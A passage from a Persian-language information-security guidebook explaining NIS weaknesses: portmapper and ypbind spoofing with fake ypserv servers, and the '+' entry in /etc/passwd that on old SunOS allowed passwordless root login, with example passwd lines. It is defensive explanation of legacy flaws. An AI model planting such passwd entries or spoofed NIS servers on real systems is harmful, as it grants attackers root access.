‫ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻛﺎﺭ ﻧﻜﺮﺩﻩﺍﻧﺪ‪ .‬ﺍﮔﺮ ﻗﺼﺪ ﺩﺍﺭﻳﺪ ﺍﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ ،‬ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺁﻧﻬـﺎ ﻫﻤﺎﻧﮕﻮﻧـﻪ‬
‫ﻛﻪ ﺑﺎﻳﺪ ﻋﻤﻞ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻳﺎﺩﺁﻭﺭﻱ ﻣﻲﺷﻮﺩ ﮐﻪ ﺻﺮﻑ ﺧﻮﺍﻧﺪﻥ ﺍﺳﻨﺎﺩ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﻛﻔﺎﻳﺖ ﻧﻤﻲﻛﻨﺪ‪.‬‬
‫ﻣﺤﺪﻭﺩﻳﺖﻫﺎﻱ ‪NIS‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ ،NIS‬ﻧﻘﻄﻪ ﺷﺮﻭﻉ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﺠﺮﺑﻴﺎﺕ ﻣﻮﻓﻖ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ‪ Unix‬ﺑﻮﺩ‪ .‬ﭼﻮﻥ ‪ NIS‬ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﻛﻨﺘـﺮﻝ ﻣـﻲﻛﻨـﺪ‪،‬‬
‫ﺍﮔﺮ ﺑﺘﻮﺍﻧﻴﺪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪ NIS‬ﺭﺍ ﻗﺎﻧﻊ ﻛﻨﻴﺪ ﻛﻪ ﺭﻭﻱ ﻛﻞ ﺷﺒﻜﻪ ﺍﻋﻼﻡ ﻛﻨﺪ ﻛﻪ ﺷﻤﺎ ﻳﻚ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺩﺍﺭﻳﺪ‪ ،‬ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ﺁﻥ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫‪root:si 4NOjF9Q8JqE:0:1:Mr. Root:/:/bin/sh‬‬
‫‪+@operators::999:999:::‬‬
‫‪٣٣٢‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﺁﻥ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪ NIS .‬ﻫﻤﭽﻨـﻴﻦ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻃﻼﻋـﺎﺕ ﻣﺤﺮﻣﺎﻧـﻪﺍﻱ ﻣﺜـﻞ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﺷﺪﻩ ﺭﺍ ﺩﺭ ﺩﺳﺘﺮﺱ ﻋﻤﻮﻡ ﻗﺮﺍﺭ ﺩﻫﺪ‪.‬‬
‫ﺩﺭ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻣﺨﺘﻠﻒ ‪ NIS‬ﭼﻨﺪ ﻧﻘﺺ ﻃﺮﺍﺣﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﻪ ﻛﺎﺭﺑﺮ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺳﻴﺴﺘﻢ ‪ NIS‬ﺭﺍ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻣﺠﺪﺩ‬
‫ﻭ ﮔﻤﺮﺍﻩ ﻛﻨﺪ‪ .‬ﺍﻳﻦ ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﺑﻪ ﺩﻭ ﺭﻭﺵ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ‪ :‬ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﺳﻴﺴﺘﻢ ﻓﺮﺍﺧﻮﺍﻧﻲ ﺗﺎﺑﻊ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪ ،‬ﻭ ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ‪.NIS‬‬
‫ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ‪RPC‬‬
‫ﻓﺮﺍﺧﻮﺍﻧﻲ ﺗﺎﺑﻊ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ )‪ ١٥٩(RPC‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺗﻮﺍﺑﻊ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻳﮕﺮ ﺭﺍ ﻓﺮﺍﺧﻮﺍﻧﻲ ﻛﻨﻨﺪ‪ .‬ﺳﻴﺴﺘﻢ‬
‫‪ NIS‬ﺑﻪ ﻋﻤﻠﻜﺮﺩ ﺳﺮﻭﻳﺴﻬﺎﻱ ‪ - RPC portmapper‬ﻳﻚ ‪ daemon‬ﻛﻪ ﻧﺎﻣﻬﺎﻱ ﺧـﺪﻣﺎﺕ ﺍﺭﺍﺋـﻪﺷـﺪﻩ ﺑـﺮﺍﻱ ‪ RPC‬ﺭﺍ ﺑـﺎ ﺷـﻤﺎﺭﺓ‬
‫ﭘﻮﺭﺗﻬﺎﻱ ‪ IP‬ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﺁﻥ ﺧﺪﻣﺎﺕ ﺗﻤﺎﺱ ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩ ﻣﻄﺎﺑﻘﺖ ﻣﻲﺩﻫﺪ ‪ -‬ﻭﺍﺑﺴﺘﻪ ﺍﺳﺖ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ‪ RPC‬ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﻨﺪ ﻭﻗﺘﻲ ﻛﺎﺭﺷﺎﻥ ﺁﻏﺎﺯ ﻣﻲﺷﻮﺩ ﺧﻮﺩ ﺭﺍ ﺑﺎ ‪ portmapper‬ﺛﺒﺖ ﻣﻲﻧﻤﺎﻳﻨﺪ‪ ،‬ﻭ ﺯﻣﺎﻧﻴﻜﻪ ﻛﺎﺭﺷﺎﻥ ﺑﻪ ﭘﺎﻳﺎﻥ ﻣﻲﺭﺳﺪ ﻳﺎ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻣﺠﺪﺩ‬
‫ﻣﻲﮔﺮﺩﻧﺪ‪ ،‬ﺧﻮﺩﺷﺎﻥ ﺭﺍ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ‪ portmapper‬ﺣﺬﻑ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ‪.‬‬
‫ﺩﺭ ﻧﺴﺨﻪﻫﺎﻱ ﺍﻭﻟﻴﺔ ‪ portmapper‬ﻫﺮ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻗﺎﺩﺭ ﺑﻮﺩ ﺧﻮﺩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ‪ RPC‬ﺛﺒـﺖ ﻛﻨـﺪ‪ ،‬ﻭ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺑـﻪ‬
‫ﻣﻬﺎﺟﻤﻴﻦ ﻓﺮﺻﺖ ﻣﻲﺩﺍﺩ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ NIS‬ﺧﻮﺩ ﺭﺍ ﺛﺒﺖ ﻛﻨﻨﺪ ﻭ ﺑﺎ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩﺷﺎﻥ ﺑﻪ ﺩﺭﺧﻮﺍﺳـﺘﻬﺎ ﭘﺎﺳـﺦ ﺩﻫﻨـﺪ‪.‬‬
‫ﺑﻴﺸﺘﺮ ﻧﺴﺨﻪﻫﺎﻱ ﻓﻌﻠﻲ ‪ portmapper‬ﺗﻘﺎﺿﺎﻫﺎﻱ ﺛﺒﺖ ﻳﺎ ﺣﺬﻑ ﺧﺪﻣﺎﺕ ﺭﺍ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﺯ ﺩﺳﺘﮕﺎﻩ ﺭﺍﻩ ﺩﻭﺭ ﺁﻣﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﻳﺎ ﺑﻪ ﻳﻚ ﭘﻮﺭﺕ‬
‫ﻣﺠﺎﺯ ﺑﺎﺯﮔﺮﺩﺩ ﻛﻪ ﺍﺯ ﻳﻚ ﺍﺗﺼﺎﻝ ﺷﺮﻭﻉﺷﺪﻩ ﺍﺯ ﻳﻚ ﭘﻮﺭﺕ ﻏﻴﺮﻣﺠﺎﺯ ﻣﻲﺁﻳﺪ‪ ،‬ﺭﺩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺗﻨﻬﺎ ﻛﺎﺭﺑﺮ ﺍﺻﻠﻲ ﻣﻲﺗﻮﺍﻧـﺪ ﺗﻘﺎﺿـﺎﻫﺎﻳﻲ‬
‫ﺑﺮﺍﻱ ﺍﺿﺎﻓﻪ ﻭ ﺣﺬﻑ ﻛﺮﺩﻥ ﻧﮕﺎﺷﺘﻬﺎﻱ ﺧﺪﻣﺎﺕ ﺑﻪ ﭘﻮﺭﺗﻬﺎﻱ ﻣﺠﺎﺯ ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪ ،‬ﻭ ﺗﻤﺎﻡ ﺗﻘﺎﺿﺎﻫﺎ ﻓﻘﻂ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺼﻮﺭﺕ ﻣﺤﻠـﻲ ﺍﻧﺠـﺎﻡ‬
‫ﺷﻮﻧﺪ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻧﺴﺨﻪﻫﺎﻱ ‪ portmapper daemon‬ﻣﺮﺑﻮﻁ ﺑﻪ ﻫﻤﺔ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺍﻳﻦ ﺑﺮﺭﺳﻴﻬﺎ ﺭﺍ ﺍﻧﺠﺎﻡ ﻧﻤﻲﺩﻫﻨﺪ‪.‬‬
‫ﻻ ﺭﻭﻱ ﭘﻮﺭﺗﻬﺎﻱ ﻏﻴﺮﻣﺠـﺎﺯ ﺛﺒـﺖ ﻣـﻲﺷـﻮﻧﺪ‪ .‬ﺍﺯ ﻟﺤـﺎﻅ ﻧﻈـﺮﻱ ﺣﺘـﻲ ﺑـﺎ‬
‫ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ‪ NFS‬ﻭ ﺑﻌﻀﻲ ﺍﺯ ﺧﺪﻣﺎﺕ ‪ NIS‬ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺮﺭﺳﻴﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺑﺎﻻ ﻓﻬﺮﺳﺖ ﺷﺪ‪ ،‬ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻜﻲ ﺍﺯ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺭﺍ ﺑﺎ ﻳـﻚ ﺑﺮﻧﺎﻣـﺔ ﻣﺨـﺼﻮﺹ ﺟـﺎﻳﮕﺰﻳﻦ ﻛﻨـﺪ ﺗـﺎ ﺑﺘﻮﺍﻧـﺪ ﺑـﻪ‬
‫ﺗﻘﺎﺿﺎﻫﺎﻱ ﺳﻴﺴﺘﻢ ﺑﮕﻮﻧﻪﺍﻱ ﭘﺎﺳﺦ ﺩﻫﺪ ﻛﻪ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺧﺪﺷﻪﺩﺍﺭ ﮔﺮﺩﺩ‪.‬‬
‫ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ‪NIS‬‬
‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﮔﺎﻥ ‪ NIS‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ ،RPC‬ﺍﺯ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ NIS‬ﺍﻃﻼﻋﺎﺕ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻳﻚ ‪ daemon‬ﻣﺤﻠﻲ ﺑـﻪ ﻧـﺎﻡ‬
‫‪ ypbind‬ﺍﻃﻼﻋﺎﺕ ﺗﻤﺎﺱ ﺭﺍ ﺑﺮﺍﻱ ‪ daemon‬ﻣﺮﺑﻮﻃﺔ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ‪ NIS‬ﺑـﻪ ﻧـﺎﻡ ‪ ypserv‬ﺩﺭ ﺣﺎﻓﻈـﻪ ﻧﮕـﻪ ﻣـﻲﺩﺍﺭﺩ‪ypserv .‬‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺑﺼﻮﺭﺕ ﻣﺤﻠﻲ ﻳﺎ ﺭﺍﻩ ﺩﻭﺭ ﺍﺟﺮﺍ ﺷﺪﻩ ﺑﺎﺷﺪ‪.‬‬
‫ﺗﺤﺖ ﻧﺴﺨﻪﻫﺎﻱ ﺍﻭﻟﻴﺔ ‪ Sun OS‬ﺍﺯ ﺧﺪﻣﺎﺕ ‪) NIS‬ﻭ ﺍﺣﺘﻤﺎ ﹰﻻ ﻧﺴﺨﻪﻫﺎﻱ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺩﻳﮕﺮ( ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺷﺖ ﻛﻪ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻛﻪ ﻣﺜﻞ‬
‫‪ ypserv‬ﻛﺎﺭ ﻣﻲﻛﻨﺪ ﻭ ﺑﻪ ﺗﻘﺎﺿﺎﻫﺎﻱ ‪ ypbind‬ﺟﻮﺍﺏ ﻣﻲﺩﻫﺪ ﺭﺍ ‪ instantiate‬ﻛﺮﺩ‪ .‬ﺩﺭ ﺁﻧـﺼﻮﺭﺕ ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ ‪ deamon‬ﻣﺤﻠـﻲ‬
‫‪ ypbind‬ﻓﺮﻣﺎﻥ ﺩﺍﺩ ﻛﻪ ﺑﺠﺎﻱ ‪ ypserv‬ﻭﺍﻗﻌﻲ ﺍﺯ ﺁﻥ ﺑﺮﻧﺎﻣﻪ ﻣﺸﺎﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺳﻴﺴﺘﻢ ﺭﺍ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ‬
‫ﻛﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﻧﺴﺨﺔ ﺧﻮﺩﺵ ﺍﺯ ﻓﺎﻳﻞ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﺮﺍﻱ ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﺗﻘﺎﺿﺎﻫﺎﻱ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ!‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﻓﻌﻠﻲ ‪ NIS‬ﺍﺯ ‪ ypbind‬ﺣﺎﻭﻱ ﻳﻚ ﭘﺎﺭﺍﻣﺘﺮ ﺧﻂ ﻓﺮﻣﺎﻥ ‪ -secure‬ﻳﺎ ‪ -s‬ﺍﺳﺖ ﻛﻪ ﻫﻨﮕﺎﻡ ﺻﺪﻭﺭ ﺩﺳﺘﻮﺭ ﺷـﺮﻭﻉ ﺑـﻪ ﻛـﺎﺭ‬
‫‪ daemon‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﻜﺎﺭ ﺭﻭﺩ‪ .‬ﺍﮔﺮ ﺍﺯ ﺍﻳﻦ ﭘﺎﺭﺍﻣﺘﺮ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺑﺎﺷﺪ‪ ypbind daemon ،‬ﻫﻴﭻ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﺍﺯ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ‬
‫‪ ypserv‬ﻛﻪ ﺭﻭﻱ ﭘﻮﺭﺗﻬﺎﻱ ﻣﺠﺎﺯ ﺍﺟﺮﺍ ﻧﻤﻲﺷﻮﻧﺪ ﻧﺨﻮﺍﻫﺪ ﭘﺬﻳﺮﻓﺖ‪ .‬ﻟﺬﺍ ﺍﮔﺮ ﻛﺎﺭﺑﺮﻱ ﺑﺨﻮﺍﻫـﺪ ﻳـﻚ ‪ ypserve daemon‬ﺟﻌﻠـﻲ ﻭﺍﺭﺩ‬
‫ﺣﺎﻓﻈﻪ ﻛﻨﺪ ﺗﻼﺷﺶ ﻧﺎﺩﻳﺪﻩ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﺩﻟﻴﻞ ﻗﺎﻧﻊﻛﻨﻨﺪﻩﺍﻱ ﺑﺮﺍﻱ ﻋﺪﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺎﺭﺍﻣﺘﺮ ‪ -secure‬ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪.‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﭘﺎﺭﺍﻣﺘﺮ ‪ -secure‬ﺩﺍﺭﺍﻱ ﻳﻚ ﻧﻘﺺ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ‪ root‬ﺭﺍ ﺭﻭﻱ ﻫﺮ ﻣﺎﺷﻴﻦ ﺩﻳﮕﺮ ﻣﺘﺼﻞ ﺑﻪ ﺷـﺒﻜﻪ‬
‫ﻣﺤﻠﻲ ﻋﻮﺽ ﻛﻨﺪ ﻭ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ‪ ypserv‬ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ‪ NIS‬ﺧﻮﺩﺵ ﺑـﻪ ﺍﺟـﺮﺍ ﺩﺭﺁﻭﺭﺩ‪ ،‬ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺣﻤﻠـﻪ ﺗﻨﻬـﺎ ﺑﺎﻳـﺪ‬
‫‪159 Remote Procedure Call‬‬
‫‪٣٣٣‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫‪ ypbind‬ﻫﺪﻑ ﺭﺍ ﺑﻪ ﺁﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺷﺎﺭﻩ ﺩﻫﺪ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻭﺍﻗﻊﺷﺪﻩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﻭﻱ ﻳﻚ ﭘـﻮﺭﺕ ﻣﺠـﺎﺯ ﺩﺭﺣـﺎﻝ‬
‫ﺍﺟﺮﺍ ﺑﺎﺷﺪ‪ ،‬ﻭ ﻟﺬﺍ ﭘﺎﺳﺨﻬﺎﻱ ﺁﻥ ﺭﺩ ﻧﺨﻮﺍﻫﻨﺪ ﺷﺪ‪ .‬ﻣﻬﺎﺟﻢ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ‪ ypserv‬ﻗﻼﺑﻲ ﺑﻨﻮﻳﺴﺪ ﻛﻪ ﺭﻭﻱ ﻳﻚ ﺳﻴـﺴﺘﻢ ﺳـﺎﺯﮔﺎﺭ‬
‫ﺑﺎ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻳﺪ‪ .‬ﭘﻮﺭﺗﻬﺎﻱ ﻣﺠﺎﺯ ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﻣﻌﻨﺎﻱ ﺧﺎﺻﻲ ﻧﺪﺍﺭﻧﺪ‪ ،‬ﻟﺬﺍ ﻫﺮ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﺭﻭﻱ ﻫـﺮ‬
‫ﭘﻮﺭﺗﻲ ﺍﺟﺮﺍ ﻛﻨﺪ ﻭ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﺮﺍﻱ ﺭﻭﻧﺪ ‪ ypbind‬ﻣﻘﺼﺪ ﺗﺄﻣﻴﻦ ﻧﻤﺎﻳﺪ‪.‬‬
‫‪ NIS‬ﺑﺎ "‪ "+‬ﺳﺮﺩﺭﮔﻢ ﻣﻲﺷﻮﺩ‬
‫ﺣﺘﻲ ﻭﻗﺘﻲ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ‪ NIS‬ﺑﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺻﺤﻴﺢ ﺗﻤﺎﺱ ﺑﺮﻗﺮﺍﺭ ﻣـﻲﻛﻨﻨـﺪ‪ ،‬ﻣﻤﻜـﻦ ﺍﺳـﺖ ‪ NIS‬ﻣـﺸﻜﻼﺕ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺩﻳﮕﺮﻱ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻭﺭﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺗﺮﻛﻴﺒﻲ ﺍﺯ ﺍﺷﺘﺒﺎﻫﺎﺕ ﺩﺭ ﺗﻮﺳﻌﺔ ﺍﻭﻟﻴﻪ ﻭ ﻣﺠﺪﺩ ‪ NIS‬ﺑﺎﻋﺚ ﺑﺮﻭﺯ ﺳـﺮﺩﺭﮔﻤﻲﻫـﺎﻳﻲ ﺩﺭ ﻣـﻮﺭﺩ ﻋﻼﻣـﺖ‬
‫ﺟﻤﻊ )‪ NIS (+‬ﺩﺭ ﻓﺎﻳﻞ ‪ /etc/passwd‬ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺍﮔﺮ ﺷﻤﺎ ﺍﺯ ‪ NIS‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺑﺴﻴﺎﺭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﻛﻪ ﻋﻼﻣﺖ ﺟﻤﻊ )‪ (+‬ﺩﺭ ﻓﺎﻳﻞ ‪ /etc/passwd‬ﺭﻭﻱ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﻭ ﻧـﻪ‬
‫ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ‪ .‬ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ NIS‬ﺗﺤﺖ ﺑﻌﻀﻲ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ ،Unix‬ﻋﻼﻣﺖ ﺟﻤﻊ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑﻌﻨـﻮﺍﻥ‬
‫ﻳﻚ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺗﻌﺒﻴﺮ ﺷﻮﺩ‪ .‬ﺳﺎﺩﻩﺗﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺍﻳﻦ ﻣﺸﻜﻞ‪ ،‬ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻧﺪﺍﺷﺘﻦ ﻳﻚ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺑﺎ ﻧـﺎﻡ "‪"+‬‬
‫ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ NIS‬ﺍﺳﺖ‪.‬‬
‫ﺗﻼﺵ ﺑﺮﺍﻱ ﻓﻬﻤﻴﺪﻥ ﺍﻳﻨﻜﻪ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﺭﺍ ﺑﺎﻳﺪ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﮔﺬﺍﺷﺖ ﻳﻚ ﻣﺸﻜﻞ ﺩﻳﮕﺮ ﺍﺳﺖ‪ .‬ﺩﺭ ﻧﺴﺨﻪﻫﺎﻱ ﺍﻭﻟﻴﻪ ‪ ،NIS‬ﺧـﻂ‬
‫ﺯﻳﺮ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺷﺖ‪:‬‬
‫‪+::0:0:::‬‬
‫ﻛﻪ ﺩﺭ ‪ SunOS‬ﻭ ‪ Solaris‬ﺻﺤﻴﺢ ﺑﻮﺩ‪.‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﻴﻦ ﻳﻚ ﺧﻂ ﺑﺎﻋﺚ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﻳﻚ ﻣﺸﻜﻞ ﻣﻲﺷﺪ‪ .‬ﻭﻗﺘﻲ ‪ NIS‬ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﻧﺒﻮﺩ‪ ،‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻋﻼﻣﺖ ﺟﻤﻊ ﺑﻌﻨـﻮﺍﻥ ﻧـﺎﻡ‬
‫ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﻣﻲﺷﺪ ﻭ ﻫﺮ ﻛﺴﻲ ﻣﻲﺗﻮﺍﻧﺴﺖ ﺑﺎ ﺗﺎﻳﭗ ﻛﺮﺩﻥ "‪ "+‬ﺳﻴﺴﺘﻢ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﻭﺍﺭﺩ ﺷﻮﺩ ﻭ ﺑﺪﻭﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﻪ ﺍﻋـﻼﻥ‬
‫‪١٦٠‬‬
‫ﻓﺮﻣﺎﻥ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ‪ .‬ﺑﺪﺗﺮ ﺍﺯ ﻫﻤﻪ ﺍﻳﻨﻜﻪ ﺁﻥ ﻓﺮﺩ ﺑﺎ ﺍﻣﺘﻴﺎﺯﺍﺕ ﭘﺮﺩﺳﺘﺮﺳﻲﺗﺮﻳﻦ ﻛﺎﺭﺑﺮ ﻭﺍﺭﺩ ﻣﻲﺷﺪ‪.‬‬
‫ﻳﻚ ﺭﻭﺵ ﺑﺮﺍﻱ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻥ ﺧﻄﺮ ﺩﺭ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ‪ NIS‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮ "‪ "+‬ﺑﻮﺩ‪ .‬ﻋﻼﻣـﺖ ﺟﻤـﻊ ﺭﺍ‬
‫ﺩﺭ ﺣﺎﻟﺖ ﺯﻳﺮ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ‪:‬‬
‫‪+:‘:0:0:::‬‬
